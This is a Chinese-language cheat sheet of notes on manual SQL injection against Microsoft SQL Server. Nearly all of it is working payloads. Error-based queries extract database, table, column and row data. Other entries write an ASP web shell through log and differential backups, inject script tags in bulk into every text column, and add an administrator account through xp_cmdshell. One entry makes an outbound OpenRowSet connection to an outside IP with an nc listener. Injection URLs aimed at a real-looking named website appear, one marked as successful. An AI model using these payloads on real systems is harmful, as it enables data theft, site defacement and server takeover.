MSSQL手工注入笔记

MSSQL:
■获取数据库名
and db_name()=0    会报错:在将nvarchar 值'test' 转换成数据类型int 时失败。错误信息被应用回显到页面时,即可从中得到数据库的名字
 and db_name()='master'    通过后面的and条件是否出错来影响查询的执行
 and SUBSTRING(DB_NAME(),1,1)='t'
select name from test.dbo.tea where ID=and DB_NAME(x)=0     这里x用1,2,3代替即可逐个获取每个数据库的名字
■获取用户名
 and user=0
■获取版本信息
 and @@version=0
■获取服务器名
 and @@servername=0
■获取服务名
 and @@servicename=0
■获取系统用户名
 and system_user=0
■一次性获取所有基本信息
 AnD (dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0
■一次性探测权限
 AnD (cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006f0077006e0065007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006200610063006b00750070006f00700065007200610074006f007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006400610074006100770072006900740065007200) aS vArChAr))=0
■获取数据库的数目    这里用cast()把计数结果转换成字符串,使其与0比较时触发类型转换错误,从而在错误信息中得到数目
 AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0
■获取数据库文件
 and (select top 1 filename from (select top __i__ filename from master..sysdatabases order by filename) t order by filename desc)=0    <__i__表示单个数字1,2,3>
同时获取数据库名和数据库文件名
 AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY nAmE dEsC)=0
■获取数据库的表的数目
  and (select cast(count(1) as varchar)+char(9) from <数据库名>..sysobjects where xtype=0x75)=0
■获取数据库的表 <一次只能查一个,所以只能not in 逐个>
 and (select top 1 name from (select top __i__ name from <数据库名>..sysobjects where xtype=0X75 order by name) t order by name desc)=0
      
  1. and (select top 1 name from (select top 1 name from qds114576626_db..sysobjects where xtype=0X75 order by name) t order by name desc)=0
  2. and (select top 1 quotename(name) from qds114576626_db.dbo.sysobjects where xtype=char(85) AND name not in (select top 2 name from qds114576626_db.dbo.sysobjects where xtype=char(85)))=0
 and (select top 1 quotename(name) from <数据库名>.dbo.sysobjects where xtype=char(85) AND name not in (select top __i__ name from <数据库名>.dbo.sysobjects where xtype=char(85)))=0
■获取表的字段的数目
 and (select cast(count(1) as varchar)+char(9) from <数据库名>..syscolumns where id=object_id('<表名>'))=0
■获取数据库表的字段
 and (select top 1 name from (select top __i__ name,id from <数据库名>..syscolumns where id=object_id('<表名>') order by name) t order by name desc)=0
 and (select col_name(object_id('<表名>'),__i__))=0    这句要方便一些,通过递增__i__即可逐个取字段名,不用先读字段数
■获取满足条件的表的记录数
 AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm <数据库名>..<表名>)=0
■获取数据库的内容    <也只能取出多个列的第一个数据>
 AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(<列名1> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名2> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名3> aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ <列名1>,<列名2>,<列名3> FrOm <数据库名>..<表名> oRdEr bY <排序列名>) t oRdEr bY <排序列名> dEsC)=0
■基于日志差异备份
        
  1. -- 1. 进行初始备份
  2. ; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt ( a image ) Backup Log TestDB to disk = '<临时文件名:e:\wwwroot\m.asp>' With Init --
  3. -- 2. 插入数据
  4. ; Insert Into ttt Values ( 0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E )--
  5. -- 3. 备份并获得文件,删除临时表
  6. ; Backup Log <数据库名> To Disk = '<要生成的文件名:e:\wwwroot\m.asp>' ; Drop Table ttt Alter Database TestDB Set Recovery SIMPLE --
■基于数据库差异备份
        
  1. 1. 进行差异备份准备工作
  2. ; Declare @a Sysname ; Set @a = db_name (); Declare @file VarChar ( 400 ); Set @file =<临时文件名: 0x633A5C617364662E617370 >; Drop Table ttt Create Table ttt ( c Image ) Backup Database @a To Disk = @file --
  3. 2. 将数据写入到数据库
  4. ; Insert Into ttt Values ( 0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E )--
  5. 3. 备份数据库并作最后的清理工作
  6. ; Declare @b SysName ; Set @b = db_name (); Declare @file1 VarChar ( 400 ); Set @file1 =<最终需要备份出的文件名: 0x633A5C617364662E617370 >; Backup Database @b To Disk = @file1 With Differential , Format ; Drop Table ttt ;--
      
  1. 备份数据库 getshell
  2. http : //www.swsresearch.com/cn/ViewItem.aspx?table=swwebcontent&id=17637';execute('ins'%2b'ert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);') -- '
  3. http : //www.swsresearch.com/cn/ViewItem.aspx?table=swwebcontent&id=17637';execute('backup database web1 to disk = ''d:\\m.asp''') -- ' 成功
  4. 查看目录
  5. http : //www.swsresearch.com/cn/ViewItem.aspx?table=swwebcontent&id=17637';execute('sele'%2b'ct convert(int,(se'%2b'lect top 1 subdirectory fr'%2b'om (se'%2b'lect top 3 subdirectory fr'%2b'om D99_Tmp order by subdirectory )K order by subdirectory desc))') -- '
■数据库插马(插指定数据库的指定表的满足条件的记录)
;update <数据库名>..<表名> set <字段名>=<字段名>+'<script>alert("有漏洞啊。")</script>' where <要满足的条件>--
■数据库批量插马(插所有可插入的字段和记录,危险!!请谨慎操作!!)
        
  1. ; dEcLaRe @t vArChAr ( 255 ), @c vArChAr ( 255 ) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a . nAmE , b . nAmE FrOm sYsObJeCtS a , sYsCoLuMnS b wHeRe a . iD = b . iD AnD a . xTyPe = 'u' AnD ( b . xTyPe = 99 oR b . xTyPe = 35 oR b . xTyPe = 231 oR b . xTyPe = 167 ) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t , @c while (@ @fEtCh_status = 0 ) bEgIn exec ( 'UpDaTe [' + @t + '] sEt [' + @c + ']=rtrim(convert(varchar,[' + @c + ']))+cAsT(<要插入的内容(0x编码形式)> aS vArChAr(200<此处长度应做相应修改>))' ) fEtCh next FrOm tAbLe_cursoR iNtO @t , @c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR ;--
  2. ; DECLARE @T VARCHAR ( 255 ), @C VARCHAR ( 255 ) DECLARE Table_Cursor CURSOR FOR SELECT a . name , b . name FROM sysobjects a , s yscolumns b WHERE a . id = b . id AND a . xtype = 'u' AND ( b . xtype = 99 OR b . xtype = 35 OR b . xtype = 231 OR b . xtype = 167 ) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T , @C WHILE (@ @FETCH_STATUS = 0 ) BEGIN EXEC ( 'UPDATE [' + @T + '] SET [' + @C + ']=RTRIM(CONVERT(VARCHAR(4000),[' + @C + ']))+''<要插入的内容>''' ) FETCH NEXT FROM Table_Cursor INTO @T , @C END CLOSE Table_Cursor DEALLOCATE Table_Cursor --
■执行命令行(无结果返回)
;exec master..xp_cmdshell 'net user name password /add & net localgroup administrators name /add'--
恢复存储过程 xp_cmdshell
        
  1. ; Exec Master .. sp_dropextendedproc 0x780070005F0063006D0064007300680065006C006C00 ; Exec Master .. sp_addextendedproc 0x780070005F0063006D0064007300680065006C006C00 , 0x78706C6F6737302E646C6C --
■SQLServer 2005 开启和关闭 xp_cmdshell
        
  1. ; EXEC master .. sp_configure 'show advanced options' , 1 ; RECONFIGURE ; EXEC master .. sp_configure 'xp_cmdshell' , 1 ; RECONFIGURE ;
  2. 关闭 xp_cmdshell
  3. ; EXEC master .. sp_configure 'show advanced options' , 1 ; RECONFIGURE ; EXEC master .. sp_configure 'xp_cmdshell' , 0 ; RECONFIGURE ;
■SQLServer 2005 开启和关闭 OpenDataSource/OpenRowSet
      
  1. 开启:
  2. ; EXEC master .. sp_configure 'show advanced options' , 1 ; RECONFIGURE ; EXEC master .. sp_configure 'Ad Hoc Distributed Queries' , 1 ; RECONFIGURE ;
  3. 关闭:
  4. ; EXEC master .. sp_configure 'show advanced options' , 1 ; RECONFIGURE ; EXEC master .. sp_configure 'Ad Hoc Distributed Queries' , 0 ; RECONFIGURE ;
■SQLServer 2005 日志差异备份
        
  1. alter database [ testdb ] set recovery full
  2. declare @d nvarchar ( 4000 ) set @d = 0x640062006200610063006B00 backup database __dbname__ to disk = @d with init --
  3. drop table [ itpro ]--
  4. create table [ itpro ]([ a ] image )--
  5. declare @d nvarchar ( 4000 ) set @d = 0x640062006200610063006B00 backup log __dbname__ to disk = @d with init --
  6. insert into [ itpro ]([ a ]) values ( __varchar (木马内容))--
  7. declare @d nvarchar ( 4000 ) set @d = __nvarchar (文件名) backup log __dbname__ to disk = @d with init --
  8. drop table [ itpro ] declare @d nvarchar ( 4000 ) set @d = 0x640062006200610063006B00 backup log __dbname__ to disk = @d with init --
■通过openrowset查看数据库服务器IP
        
  1. NC 监听 80 端口: nc - vvlp 80 (让数据库服务器反向连接过来以看到其 IP ,监听端自己的机器并不一定要装 MSSQL ),在注射点上注射如下语句:
  2. ; insert into OPENROWSET ( 'SQLOLEDB' , 'uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=58.53.58.32,80;' , 'select * from dest_table' ) select * from src_table ;--
  3. 因为这里只是为了在监听端看到数据库服务器发起连接的来源 IP ,所以连接串里其他参数的值无所谓。端口设置成 80 ,是为了预防一些机器的出站规则只允许访问外部的 80 端口;若数据库服务器完全禁止出站连接,则不会有连接回来